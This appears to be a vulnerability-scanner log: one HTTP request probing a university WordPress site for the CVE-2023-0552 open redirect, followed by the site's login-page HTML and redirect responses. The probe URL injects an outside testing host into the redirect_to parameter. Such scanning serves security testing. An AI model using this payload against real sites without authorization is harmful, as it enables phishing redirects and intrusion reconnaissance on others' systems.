[CVE-2023-0552] Dumped HTTP request for https://particletheory.science.unimelb.edu.au/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me


GET /wp-admin?piereg_logout_url=true&redirect_to=https://oast.me HTTP/1.1
Host: particletheory.science.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2023-0552] Dumped HTTP response https://particletheory.science.unimelb.edu.au/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Aug 2025 15:18:11 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Referrer-Policy: strict-origin-when-cross-origin
Server: openresty
Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly
Set-Cookie: wordpress_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpress_sec_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpress_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/particletheory/wp-content/plugins
Set-Cookie: wordpress_sec_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/particletheory/wp-content/plugins
Set-Cookie: wordpress_logged_in_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpress_logged_in_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wp-settings-0=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wp-settings-time-0=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpress_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpress_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpress_sec_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpress_sec_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpressuser_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpresspass_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpressuser_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wordpresspass_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: wp-postpass_faadb50bb8894c99698185cabae93749=%20; expires=Tue, 06 Aug 2024 15:18:11 GMT; Max-Age=0; path=/
Set-Cookie: eb_Kuno0Hujut7Da=Zim9Deten6Zoh2
Vary: Cookie
X-Frame-Options: SAMEORIGIN

<!DOCTYPE html>
	<html lang="en-AU">
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<title>Log In &lsaquo; Theoretical Particle Physics &#8212; WordPress</title>
	<meta name='robots' content='max-image-preview:large, noindex, noarchive' />
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script>
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script>
<link rel='stylesheet' id='dashicons-css' href='https://particletheory.science.unimelb.edu.au/wp-includes/css/dashicons.min.css?ver=6.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='buttons-css' href='https://particletheory.science.unimelb.edu.au/wp-includes/css/buttons.min.css?ver=6.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='forms-css' href='https://particletheory.science.unimelb.edu.au/wp-admin/css/forms.min.css?ver=6.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='l10n-css' href='https://particletheory.science.unimelb.edu.au/wp-admin/css/l10n.min.css?ver=6.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='login-css' href='https://particletheory.science.unimelb.edu.au/wp-admin/css/login.min.css?ver=6.8.2' type='text/css' media='all' />
	<style type="text/css">
	#loginform-shibboleth {margin-bottom: 20px; text-align: center; overflow: auto; }
	#loginform {display: none; margin: 0}
	#shibboleth-guest-login-wrapper {margin-top: 10px;}
	</style>
	<script type="text/javascript">
		(function($) {
			$(document).ready(function() {
				$('#loginform-shibboleth').insertBefore("#loginform").show();
				$('#shibboleth-guest-login').click(function(){
					var loginform = $('#loginform');
					var nav = $('#nav');
					var wrapper = $('#shibboleth-guest-login-wrapper');
					if(loginform.css('display') == 'block') {
						loginform.slideUp();
						nav.hide();
						wrapper.slideDown();
					} else {
						loginform.slideDown();
						nav.show();
						wrapper.slideUp();
						loginform.find('#user_pass').prop('disabled', false);
					}
				})
				if ($('#login_error').length > 0) {
					$('#loginform').slideDown();
					$('#nav').show();
					$('#shibboleth-guest-login-wrapper').slideUp();
				}
			});
		})(jQuery);
	</script>
		<style>
	.tos-mesage {
		padding: 26px 24px 26px;
		background-color: #fef7f1;
		margin-top: 20px;
		margin-left: 0;
		font-weight: 400;
		overflow: hidden;
		border: 1px solid #c3c4c7;
		box-shadow: 0 1px 3px rgba(0, 0, 0, 0.04);
	}

	.notice {
		margin-top: 10px;
	}
	</style>
		<meta name='referrer' content='strict-origin-when-cross-origin' />
		<meta name="viewport" content="width=device-width, initial-scale=1.0" />
				<style>
				.language-switcher {
					display: none;
				}
				form#language-switcher {
					margin-top: 40px;
				}
			</style>
			<script type="application/javascript">
				function login_page_loaded(callback) {
					if (document.readyState !== 'loading') {
						callback();
					} else {
						document.addEventListener('DOMContentLoaded', callback);
					}
				}

				login_page_loaded(function () {
					var switcher = jQuery('.language-switcher');
					if (switcher.length) {
						switcher.detach().appendTo('#login').show();
					}
				});
			</script>
			<style id="branda-login-screen-css" type="text/css">#login h1{opacity:1.00}
#login h1, #login h1 a {display: block;}
#login h1 a {background: transparent url(https://blogs.unimelb.edu.au/files/2015/11/UOM-Rev3D_S_web-1jp5cuw-e1448515258832.jpg) no-repeat 50% 5%;background-size: contain;margin: 0px auto 25px auto;overflow: hidden;text-indent: -9999px;height: 151px;width: 150px;
}
#login h1{margin:0 auto 25px auto;}
#login {background-color: transparent;width: 320px;
padding-top: 8%;
padding-right: 0;
padding-bottom: 0;
padding-left: 0;
}
.login form {background-color: #fff;border-width: 0px;-webkit-box-shadow: 0px 1px 0px 0px rgba(0,0,0,0.13);-moz-box-shadow: 0px 1px 0px 0px rgba(0,0,0,0.13);box-shadow: 0px 1px 0px 0px rgba(0,0,0,0.13);
margin-top:20px;padding-top:26px;padding-right:24px;padding-bottom:46px;padding-left:24px;}
.login form label{color:#777}
.login input[type=text]{color:#32373c;}
.login input[type=text]{border-color:#ddd;}
.login input[type=text]{background-color:#fbfbfb;}
.login input[type=text]:hover{color:#32373c;}
.login input[type=text]:hover{border-color:#5b9dd9;}
.login input[type=text]:hover{background-color:#ddd;}
.login input[type=text]:active{color:#32373c;}
.login input[type=text]:active{border-color:#ddd;}
.login input[type=text]:active{background-color:#fbfbfb;}
.login input[type=text]:focus{color:#32373c;}
.login input[type=text]:focus{border-color:#5b9dd9;}
.login input[type=text]:focus{background-color:#fbfbfb;}
.login input[type=password]{color:#32373c;}
.login input[type=password]{border-color:#ddd;}
.login input[type=password]{background-color:#fbfbfb;}
.login input[type=password]:hover{color:#32373c;}
.login input[type=password]:hover{border-color:#5b9dd9;}
.login input[type=password]:hover{background-color:#ddd;}
.login input[type=password]:active{color:#32373c;}
.login input[type=password]:active{border-color:#ddd;}
.login input[type=password]:active{background-color:#fbfbfb;}
.login input[type=password]:focus{color:#32373c;}
.login input[type=password]:focus{border-color:#5b9dd9;}
.login input[type=password]:focus{background-color:#fbfbfb;}
.login input[type=checkbox]{color:#32373c;}
.login input[type=checkbox]{border-color:#ddd;}
.login input[type=checkbox]{background-color:#fbfbfb;}
.login input[type=checkbox]:hover{color:#32373c;}
.login input[type=checkbox]:hover{border-color:#5b9dd9;}
.login input[type=checkbox]:hover{background-color:#ddd;}
.login input[type=checkbox]:active{color:#32373c;}
.login input[type=checkbox]:active{border-color:#ddd;}
.login input[type=checkbox]:active{background-color:#fbfbfb;}
.login input[type=checkbox]:focus{color:#32373c;}
.login input[type=checkbox]:focus{border-color:#5b9dd9;}
.login input[type=checkbox]:focus{background-color:#fbfbfb;}
.login input[type=submit]{border-color:#006799;}
.login input[type=submit]{background-color:#0085ba;}
.login input[type=submit]:hover{border-color:#006799;}
.login input[type=submit]:hover{background-color:#008ec2;}
.login input[type=submit]:active{border-color:#006799;}
.login input[type=submit]:active{background-color:#0073aa;}
.login input[type=submit]:focus{border-color:#5b9dd9;}
.login input[type=submit]:focus{background-color:#008ec2;}
.login form input.button.button-large{border-width: 1px;height: 30px;-webkit-border-radius: 3px;-moz-border-radius: 3px;border-radius: 3px;}
#backtoblog, #nav, .privacy-policy-page-link{text-align: left;}
.login #nav, .login #nav a {color: #555d66;}
.login #nav a:focus {color: #555d66;}
.login #nav a:hover {color: #555d66;}
.login #nav a:active {color: #555d66;}
.login #backtoblog, .login #backtoblog a {color: #555d66;}
.login #backtoblog a:focus {color: #999;}
.login #backtoblog a:hover {color: #999;}
.login #backtoblog a:active {color: #999;}
.login .privacy-policy-page-link, .login .privacy-policy-page-link a {color: #0073aa;}
.login .privacy-policy-page-link a:focus {color: #999;}
.login .privacy-policy-page-link a:hover {color: #999;}
.login .privacy-policy-page-link a:active {color: #999;}
					.login form input[type=text]:focus,
					.login form input[type=password]:focus,
					.login form input[type=checkbox]:focus,
					.login form input[type=submit]:focus
					{
					border-color:#5b9dd9;
					-webkit-box-shadow:0 0 2px rgba(91,157,217,0.8);
					-moz-box-shadow:0 0 2px rgba(91,157,217,0.8);
					box-shadow:0 0 2px rgba(91,157,217,0.8);
					}
					.login form{background-color:#fff}
.login form .button{background-color:#0085ba}
.login form .button{color:#fff}
.login form .button.wp-hide-pw{color:#0085ba}
.login form .button:focus{background-color:#008ec2}
.login form .button.wp-hide-pw:focus{color:#0085ba}
.login form .button:focus{color:#fff}
.login form .button:hover{background-color:#008ec2}
.login form .button.wp-hide-pw:hover{color:#0085ba}
.login form .button:hover{color:#fff}
.login form .button:active{background-color:#0073aa}
.login form .button.wp-hide-pw:active{color:#0085ba}
.login form .button:active{color:#fff}
.login form input[type=submit] {-webkit-border-radius: 3px;-moz-border-radius: 3px;border-radius: 3px;}.login #login #login_error{background-color:#fff}
				.login #login #login_error {
				border-color: #dc3232;
				}
				.login #login #login_error{color:#444}
.login #login #login_error a{color:#0073aa}
.login #login #login_error a:hover{color:#00a0d2}
.login #login #login_error a:active{color:#0073aa}
.login #login #login_error a:focus{color:#124964}
.login #nav a{color:#555d66}
.login #nav a:hover{color:#555d66}
.login #backtoblog a{color:#555d66}
.login #backtoblog a:hover{color:#999}
.login .privacy-policy-page-link a{color:#0073aa}
.login .privacy-policy-page-link a:hover{color:#999}
.branda-login {margin-top:0px;margin-right:auto;margin-bottom:0px;margin-left:auto;width:100%;background-color:transparent;}
</style>
<style id="branda-login-screen-background" type="text/css">body, .branda-background-mask{background-color:#f1f1f1}
</style><style id="branda-login-screen" type="text/css">
.cb-slideshow,
.cb-slideshow li,
.cb-slideshow li span {
	line-height: 0;
}
#login_error {
	opacity: 1.00}
</style>
	</head>
	<body class="login no-js login-action-login wp-core-ui  locale-en-au">
	<script type="text/javascript">
/* <![CDATA[ */
document.body.className = document.body.className.replace('no-js','js');
/* ]]> */
</script>

	<div class="branda-login">			<h1 class="screen-reader-text">Log In</h1>
			<div id="login">
		<h1 role="presentation" class="wp-login-logo"><a href=""></a></h1>
	
		<form name="loginform" id="loginform" action="https://blogs.unimelb.edu.au/particletheory/wp-login.php" method="post">
			<p>
				<label for="user_login">Username or Email Address</label>
				<input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" autocomplete="username" required="required" />
			</p>

			<div class="user-pass-wrap">
				<label for="user_pass">Password</label>
				<div class="wp-pwd">
					<input type="password" name="pwd" id="user_pass" class="input password-input" value="" size="20" autocomplete="current-password" spellcheck="false" required="required" />
					<button type="button" class="button button-secondary wp-hide-pw hide-if-no-js" data-toggle="0" aria-label="Show password">
						<span class="dashicons dashicons-visibility" aria-hidden="true"></span>
					</button>
				</div>
			</div>
						<p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever"  /> <label for="rememberme">Remember Me</label></p>
			<p class="submit">
				<input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" />
									<input type="hidden" name="redirect_to" value="https://blogs.unimelb.edu.au/particletheory/wp-admin/?piereg_logout_url=true&amp;redirect_to=https://oast.me/" />
									<input type="hidden" name="testcookie" value="1" />
			</p>
		</form>

					<p id="nav">
				<a class="wp-login-lost-password" href="https://blogs.unimelb.edu.au/particletheory/wp-login.php?action=lostpassword">Lost your password?</a>			</p>
			<script type="text/javascript">
/* <![CDATA[ */
function wp_attempt_focus() {setTimeout( function() {try {d = document.getElementById( "user_login" );d.focus(); d.select();} catch( er ) {}}, 200);}
wp_attempt_focus();
if ( typeof wpOnload === 'function' ) { wpOnload() }
/* ]]> */
</script>
		<p id="backtoblog">
			<a href="https://particletheory.science.unimelb.edu.au/">&larr; Go to Theoretical Particle Physics</a>		</p>
			</div>
				<div class="language-switcher">
				<form id="language-switcher" method="get">

					<label for="language-switcher-locales">
						<span class="dashicons dashicons-translation" aria-hidden="true"></span>
						<span class="screen-reader-text">
							Language						</span>
					</label>

					<select name="wp_lang" id="language-switcher-locales"><option value="en_US" lang="en" data-installed="1">English (United States)</option>
<option value="ar" lang="ar" data-installed="1">العربية</option>
<option value="ary" lang="ar" data-installed="1">العربية المغربية</option>
<option value="as" lang="as" data-installed="1">অসমীয়া</option>
<option value="az" lang="az" data-installed="1">Azərbaycan dili</option>
<option value="azb" lang="az" data-installed="1">گؤنئی آذربایجان</option>
<option value="bel" lang="be" data-installed="1">Беларуская мова</option>
<option value="bg_BG" lang="bg" data-installed="1">Български</option>
<option value="bn" lang="" data-installed="1">bn</option>
<option value="bn_BD" lang="bn" data-installed="1">বাংলা</option>
<option value="bo" lang="bo" data-installed="1">བོད་ཡིག</option>
<option value="bs_BA" lang="bs" data-installed="1">Bosanski</option>
<option value="ca" lang="ca" data-installed="1">Català</option>
<option value="ceb" lang="ceb" data-installed="1">Cebuano</option>
<option value="ckb" lang="ku" data-installed="1">كوردی‎</option>
<option value="cs_CZ" lang="cs" data-installed="1">Čeština</option>
<option value="cy" lang="cy" data-installed="1">Cymraeg</option>
<option value="da_DK" lang="da" data-installed="1">Dansk</option>
<option value="de_CH" lang="de" data-installed="1">Deutsch (Schweiz)</option>
<option value="de_CH_informal" lang="de" data-installed="1">Deutsch (Schweiz, Du)</option>
<option value="de_DE" lang="de" data-installed="1">Deutsch</option>
<option value="de_DE_formal" lang="de" data-installed="1">Deutsch (Sie)</option>
<option value="dzo" lang="dz" data-installed="1">རྫོང་ཁ</option>
<option value="el" lang="el" data-installed="1">Ελληνικά</option>
<option value="en_AU" lang="en" selected='selected' data-installed="1">English (Australia)</option>
<option value="en_CA" lang="en" data-installed="1">English (Canada)</option>
<option value="en_GB" lang="en" data-installed="1">English (UK)</option>
<option value="en_NZ" lang="en" data-installed="1">English (New Zealand)</option>
<option value="en_ZA" lang="en" data-installed="1">English (South Africa)</option>
<option value="eo" lang="eo" data-installed="1">Esperanto</option>
<option value="es_AR" lang="es" data-installed="1">Español de Argentina</option>
<option value="es_CL" lang="es" data-installed="1">Español de Chile</option>
<option value="es_CO" lang="es" data-installed="1">Español de Colombia</option>
<option value="es_CR" lang="es" data-installed="1">Español de Costa Rica</option>
<option value="es_ES" lang="es" data-installed="1">Español</option>
<option value="es_GT" lang="es" data-installed="1">Español de Guatemala</option>
<option value="es_MX" lang="es" data-installed="1">Español de México</option>
<option value="es_PE" lang="es" data-installed="1">Español de Perú</option>
<option value="es_VE" lang="es" data-installed="1">Español de Venezuela</option>
<option value="et" lang="et" data-installed="1">Eesti</option>
<option value="eu" lang="eu" data-installed="1">Euskara</option>
<option value="fa_IR" lang="fa" data-installed="1">فارسی</option>
<option value="fi" lang="fi" data-installed="1">Suomi</option>
<option value="fo" lang="" data-installed="1">fo</option>
<option value="fr_BE" lang="fr" data-installed="1">Français de Belgique</option>
<option value="fr_CA" lang="fr" data-installed="1">Français du Canada</option>
<option value="fr_FR" lang="fr" data-installed="1">Français</option>
<option value="fur" lang="fur" data-installed="1">Friulian</option>
<option value="gd" lang="gd" data-installed="1">Gàidhlig</option>
<option value="gl_ES" lang="gl" data-installed="1">Galego</option>
<option value="gu" lang="gu" data-installed="1">ગુજરાતી</option>
<option value="haz" lang="haz" data-installed="1">هزاره گی</option>
<option value="he_IL" lang="he" data-installed="1">עִבְרִית</option>
<option value="hi_IN" lang="hi" data-installed="1">हिन्दी</option>
<option value="hr" lang="hr" data-installed="1">Hrvatski</option>
<option value="hu_HU" lang="hu" data-installed="1">Magyar</option>
<option value="hy" lang="hy" data-installed="1">Հայերեն</option>
<option value="id_ID" lang="id" data-installed="1">Bahasa Indonesia</option>
<option value="is_IS" lang="is" data-installed="1">Íslenska</option>
<option value="it_IT" lang="it" data-installed="1">Italiano</option>
<option value="ja" lang="ja" data-installed="1">日本語</option>
<option value="jv_ID" lang="jv" data-installed="1">Basa Jawa</option>
<option value="ka_GE" lang="ka" data-installed="1">ქართული</option>
<option value="kab" lang="kab" data-installed="1">Taqbaylit</option>
<option value="kk" lang="kk" data-installed="1">Қазақ тілі</option>
<option value="km" lang="km" data-installed="1">ភាសាខ្មែរ</option>
<option value="ko_KR" lang="ko" data-installed="1">한국어</option>
<option value="lo" lang="lo" data-installed="1">ພາສາລາວ</option>
<option value="lt_LT" lang="lt" data-installed="1">Lietuvių kalba</option>
<option value="lv" lang="lv" data-installed="1">Latviešu valoda</option>
<option value="mk_MK" lang="mk" data-installed="1">Македонски јазик</option>
<option value="ml_IN" lang="ml" data-installed="1">മലയാളം</option>
<option value="mn" lang="mn" data-installed="1">Монгол</option>
<option value="mr" lang="mr" data-installed="1">मराठी</option>
<option value="ms_MY" lang="ms" data-installed="1">Bahasa Melayu</option>
<option value="my_MM" lang="my" data-installed="1">ဗမာစာ</option>
<option value="nb_NO" lang="nb" data-installed="1">Norsk bokmål</option>
<option value="ne_NP" lang="ne" data-installed="1">नेपाली</option>
<option value="nl_BE" lang="nl" data-installed="1">Nederlands (België)</option>
<option value="nl_NL" lang="nl" data-installed="1">Nederlands</option>
<option value="nl_NL_formal" lang="nl" data-installed="1">Nederlands (Formeel)</option>
<option value="nn_NO" lang="nn" data-installed="1">Norsk nynorsk</option>
<option value="oci" lang="oc" data-installed="1">Occitan</option>
<option value="pa_IN" lang="pa" data-installed="1">ਪੰਜਾਬੀ</option>
<option value="pl_PL" lang="pl" data-installed="1">Polski</option>
<option value="ps" lang="ps" data-installed="1">پښتو</option>
<option value="pt_BR" lang="pt" data-installed="1">Português do Brasil</option>
<option value="pt_PT" lang="pt" data-installed="1">Português</option>
<option value="pt_PT_ao90" lang="pt" data-installed="1">Português (AO90)</option>
<option value="rhg" lang="rhg" data-installed="1">Ruáinga</option>
<option value="ro_RO-nodia" lang="" data-installed="1">ro_RO-nodia</option>
<option value="ro_RO" lang="ro" data-installed="1">Română</option>
<option value="ru_RU" lang="ru" data-installed="1">Русский</option>
<option value="sah" lang="sah" data-installed="1">Сахалыы</option>
<option value="si_LK" lang="si" data-installed="1">සිංහල</option>
<option value="sk_SK" lang="sk" data-installed="1">Slovenčina</option>
<option value="sl_SI" lang="sl" data-installed="1">Slovenščina</option>
<option value="sq" lang="sq" data-installed="1">Shqip</option>
<option value="sr_CS" lang="" data-installed="1">sr_CS</option>
<option value="sr_RS" lang="sr" data-installed="1">Српски језик</option>
<option value="su_ID" lang="" data-installed="1">su_ID</option>
<option value="sv_SE" lang="sv" data-installed="1">Svenska</option>
<option value="sw" lang="sw" data-installed="1">Kiswahili</option>
<option value="szl" lang="szl" data-installed="1">Ślōnskŏ gŏdka</option>
<option value="ta_IN" lang="ta" data-installed="1">தமிழ்</option>
<option value="tah" lang="ty" data-installed="1">Reo Tahiti</option>
<option value="te" lang="te" data-installed="1">తెలుగు</option>
<option value="th-continents-cities" lang="" data-installed="1">th-continents-cities</option>
<option value="th-ms" lang="" data-installed="1">th-ms</option>
<option value="th" lang="th" data-installed="1">ไทย</option>
<option value="tl" lang="tl" data-installed="1">Tagalog</option>
<option value="tr_TR" lang="tr" data-installed="1">Türkçe</option>
<option value="tt_RU" lang="tt" data-installed="1">Татар теле</option>
<option value="ug_CN" lang="ug" data-installed="1">ئۇيغۇرچە</option>
<option value="uk" lang="uk" data-installed="1">Українська</option>
<option value="ur" lang="ur" data-installed="1">اردو</option>
<option value="uz_UZ" lang="uz" data-installed="1">O‘zbekcha</option>
<option value="vi" lang="vi" data-installed="1">Tiếng Việt</option>
<option value="vi_VN" lang="" data-installed="1">vi_VN</option>
<option value="wordpress-continents-cities-sq" lang="" data-installed="1">wordpress-continents-cities-sq</option>
<option value="zh_CN" lang="zh" data-installed="1">简体中文</option>
<option value="zh_HK" lang="zh" data-installed="1">香港中文</option>
<option value="zh_TW" lang="zh" data-installed="1">繁體中文</option></select>
					
											<input type="hidden" name="redirect_to" value="https://blogs.unimelb.edu.au/particletheory/wp-admin/?piereg_logout_url=true&redirect_to=https://oast.me/" />
					
					
						<input type="submit" class="button" value="Change">

					</form>
				</div>
			
		<form id="loginform-shibboleth" >
		<div class="newsociallogins">
			<p style="font-size: 1.4em;"><b>Sign in to your site:</b></p><br/>
			<p>
			<a href="https://blogs.unimelb.edu.au/Shibboleth.sso/Login?target=https%3A%2F%2Fblogs.unimelb.edu.au%2Fwp-login.php%3Faction%3Dshibboleth%26redirect_to%3Dhttps%253A%252F%252Fblogs.unimelb.edu.au%252Fparticletheory%252Fwp-admin%252F%253Fpiereg_logout_url%253Dtrue%2526redirect_to%253Dhttps%253A%252F%252Foast.me%252F" style="float: none;margin-bottom: 20px;min-width: 80%;" class="button-primary">
				Use My University ID			</a><br/>
		</p>
			</div>
		<p id="shibboleth-guest-login-wrapper">(<a href="#" id="shibboleth-guest-login">Guest login here</a>)</p>
	</form>
	</div><script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-includes/js/clipboard.min.js?ver=2.0.11" id="clipboard-js"></script>
<script type="text/javascript" id="zxcvbn-async-js-extra">
/* <![CDATA[ */
var _zxcvbnSettings = {"src":"https:\/\/blogs.unimelb.edu.au\/particletheory\/wp-includes\/js\/zxcvbn.min.js"};
/* ]]> */
</script>
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-includes/js/zxcvbn-async.min.js?ver=1.0" id="zxcvbn-async-js"></script>
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6" id="wp-hooks-js"></script>
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6" id="wp-i18n-js"></script>
<script type="text/javascript" id="wp-i18n-js-after">
/* <![CDATA[ */
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
/* ]]> */
</script>
<script type="text/javascript" id="password-strength-meter-js-extra">
/* <![CDATA[ */
var pwsL10n = {"unknown":"Password strength unknown","short":"Very weak","bad":"Weak","good":"Medium","strong":"Strong","mismatch":"Mismatch"};
/* ]]> */
</script>
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-admin/js/password-strength-meter.min.js?ver=6.8.2" id="password-strength-meter-js"></script>
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-includes/js/underscore.min.js?ver=1.13.7" id="underscore-js"></script>
<script type="text/javascript" id="wp-util-js-extra">
/* <![CDATA[ */
var _wpUtilSettings = {"ajax":{"url":"\/particletheory\/wp-admin\/admin-ajax.php"}};
/* ]]> */
</script>
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-includes/js/wp-util.min.js?ver=6.8.2" id="wp-util-js"></script>
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381" id="wp-dom-ready-js"></script>
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-includes/js/dist/a11y.min.js?ver=3156534cc54473497e14" id="wp-a11y-js"></script>
<script type="text/javascript" id="user-profile-js-extra">
/* <![CDATA[ */
var userProfileL10n = {"user_id":"0","nonce":"ed437d91b9"};
/* ]]> */
</script>
<script type="text/javascript" src="https://particletheory.science.unimelb.edu.au/wp-admin/js/user-profile.min.js?ver=6.8.2" id="user-profile-js"></script>
	</body>
	</html>
	
[CVE-2023-0552] Dumped HTTP response https://particletheory.science.unimelb.edu.au/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me

HTTP/1.1 302 Found
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:10 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Location: https://blogs.unimelb.edu.au/particletheory/wp-login.php?redirect_to=https%3A%2F%2Fblogs.unimelb.edu.au%2Fparticletheory%2Fwp-admin%2F%3Fpiereg_logout_url%3Dtrue%26redirect_to%3Dhttps%3A%2F%2Foast.me%2F&reauth=1
Server: openresty
Vary: Cookie
X-Cache: BYPASS
X-Cache-Bypass-Reason: Special url
X-Redirect-By: WordPress


[CVE-2023-0552] Dumped HTTP response https://particletheory.science.unimelb.edu.au/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me

HTTP/1.1 301 Moved Permanently
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:09 GMT
Location: https://blogs.unimelb.edu.au/particletheory/wp-admin/?piereg_logout_url=true&redirect_to=https://oast.me/
Server: openresty
Vary: Cookie
X-Cache: BYPASS
X-Cache-Bypass-Reason: Special url


[CVE-2023-0552] Dumped HTTP response https://particletheory.science.unimelb.edu.au/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me

HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 166
Content-Type: text/html
Date: Wed, 06 Aug 2025 15:18:09 GMT
Location: https://particletheory.science.unimelb.edu.au/wp-admin/?piereg_logout_url=true&redirect_to=https://oast.me
Server: openresty
X-Cache-Bypass-Reason: Arguments found


